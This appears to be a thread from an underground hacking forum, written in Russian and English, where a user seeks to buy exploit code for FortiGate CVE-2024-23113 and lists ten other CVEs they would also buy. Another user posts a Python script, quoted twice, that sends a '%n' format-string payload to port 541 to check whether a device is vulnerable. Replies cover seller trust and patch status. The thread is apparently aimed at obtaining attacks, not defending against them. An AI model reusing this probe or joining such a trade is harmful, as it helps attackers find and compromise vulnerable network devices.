[BUYING] CVE-2024-23113 FortiGate Exploit!

[nickzfam]

Цена
50-150
Контакты
6E9D910752250CED7D1A920ED1FDC61C87E2EA51E3204A9BD4531ADE4056CE530F197E3BAC05
EN:

Hello all,

I am looking to buy an exploit code for the CVE in the title. Dm me on qTox. It is in my signature.

Thanks a lot,
Nickzfam
-------------------------------------------------------------------------------------------------------------------------------------

RU:

Всем здравствуйте,

Я хочу купить код эксплойта для CVE, указанный в заголовке. Напишите мне в qTox. Это у меня в подписи.

Большое спасибо,
Nickzfam

 

[nickzfam]

If you have any of these I will also purchase:

1. CVE-2024-20329
2. CVE-2024-49669
3. CVE-2024-49668
4. CVE-2024-49658
5. CVE-2024-49653
6. CVE-2024-49652
7. CVE-2024-49671
8. CVE-2024-47575
9. CVE-2024-47901
10. CVE-2024-48904

 

[prosper]

also interested

 

[cyber_tatyana]

yeah, everyone is interested to have sophisticated exploits but what kind of developer or seller is ok to develop or sell it to you?

 

[Sec13B]

Код: Скопировать в буфер обмена

import socket
import ssl
import struct

def check_vulnerability(hostname):
 context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
 context.check_hostname = False
 context.verify_mode = ssl.CERT_NONE
 context.options |= ssl.OP_NO_COMPRESSION

 with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
  sock.settimeout(5)
  try:
   sock.connect((hostname, 541))
  except socket.error as e:
   print(f"[-] Could not connect to {hostname}: {e}")
   return False

  try:
   with context.wrap_socket(sock, server_hostname=hostname) as ssock:
    initial_data = ssock.recv(8)
    if len(initial_data) < 8:
     print("[-] Failed to receive enough data from the server.")
     return False

    pkt_flags = struct.unpack('i', initial_data[:4])[0]
    pkt_len = struct.unpack('i', initial_data[4:])[0] - 2

    payload = ssock.recv(pkt_len - 8)
    if len(payload) < pkt_len - 8:
     print("[-] Incomplete payload received.")
     return False

    format_string_payload = b"reply 200\r\nrequest=auth\r\nauthip=%n\r\n\r\n\x00"
    packet = b''
    packet += 0x0001e034.to_bytes(4, 'little')
    packet += (len(format_string_payload) + 8).to_bytes(4, 'big')
    packet += format_string_payload

    ssock.send(packet)

    response = ssock.recv(1024)
    if response:
     print("[+] Device is likely not vulnerable - received response.")
     return False
    else:
     print("[+] No response received - further analysis needed.")
     return False
  except ssl.SSLError as ssl_err:
   if "tlsv1 alert" in str(ssl_err).lower():
    print(f"[+] Device {hostname} is vulnerable. Connection aborted as expected.")
    return True
   else:
    print(f"[-] Unexpected SSL error: {ssl_err}")
    return False
  except socket.error as sock_err:
   print(f"[-] Socket error: {sock_err}")
   return False

def main():
 while True:
  hostname = input("Enter the hostname to check (or 'exit' to quit): ")
  if hostname.lower() == 'exit':
   break

  is_vulnerable = check_vulnerability(hostname)
  if is_vulnerable:
   print(f"[!] Warning: {hostname} is vulnerable!")
  else:
   print(f"[+] {hostname} appears to be patched.")

if __name__ == "__main__":
 main()

 

[nickzfam]

Sec13B сказал(а):
Код: Скопировать в буфер обмена

import socket
import ssl
import struct

def check_vulnerability(hostname):
 context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
 context.check_hostname = False
 context.verify_mode = ssl.CERT_NONE
 context.options |= ssl.OP_NO_COMPRESSION

 with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
  sock.settimeout(5)
  try:
   sock.connect((hostname, 541))
  except socket.error as e:
   print(f"[-] Could not connect to {hostname}: {e}")
   return False

  try:
   with context.wrap_socket(sock, server_hostname=hostname) as ssock:
    initial_data = ssock.recv(8)
    if len(initial_data) < 8:
     print("[-] Failed to receive enough data from the server.")
     return False

    pkt_flags = struct.unpack('i', initial_data[:4])[0]
    pkt_len = struct.unpack('i', initial_data[4:])[0] - 2

    payload = ssock.recv(pkt_len - 8)
    if len(payload) < pkt_len - 8:
     print("[-] Incomplete payload received.")
     return False

    format_string_payload = b"reply 200\r\nrequest=auth\r\nauthip=%n\r\n\r\n\x00"
    packet = b''
    packet += 0x0001e034.to_bytes(4, 'little')
    packet += (len(format_string_payload) + 8).to_bytes(4, 'big')
    packet += format_string_payload

    ssock.send(packet)

    response = ssock.recv(1024)
    if response:
     print("[+] Device is likely not vulnerable - received response.")
     return False
    else:
     print("[+] No response received - further analysis needed.")
     return False
  except ssl.SSLError as ssl_err:
   if "tlsv1 alert" in str(ssl_err).lower():
    print(f"[+] Device {hostname} is vulnerable. Connection aborted as expected.")
    return True
   else:
    print(f"[-] Unexpected SSL error: {ssl_err}")
    return False
  except socket.error as sock_err:
   print(f"[-] Socket error: {sock_err}")
   return False

def main():
 while True:
  hostname = input("Enter the hostname to check (or 'exit' to quit): ")
  if hostname.lower() == 'exit':
   break

  is_vulnerable = check_vulnerability(hostname)
  if is_vulnerable:
   print(f"[!] Warning: {hostname} is vulnerable!")
  else:
   print(f"[+] {hostname} appears to be patched.")

if __name__ == "__main__":
 main()

Нажмите, чтобы раскрыть...

Thanks for the code.

Although, it seems to only be testing if the host is vulnerable to it by resetting the connection.

 

[nickzfam]

cyber_tatyana сказал(а):
yeah, everyone is interested to have sophisticated exploits but what kind of developer or seller is ok to develop or sell it to you?
Нажмите, чтобы раскрыть...

"Sophisticated" its a fucking format string

 

[cyber_tatyana]

nickzfam сказал(а):
"Sophisticated" its a fucking format string
Нажмите, чтобы раскрыть...

call it whatever you want. you can't contact the professionals easily unless you have reputation in forum or prove you're a pro.

 

[nickzfam]

Really need 2024-23113... Someone DM

 

[Енот_Полоскун]

what you will do with it and she already patched ?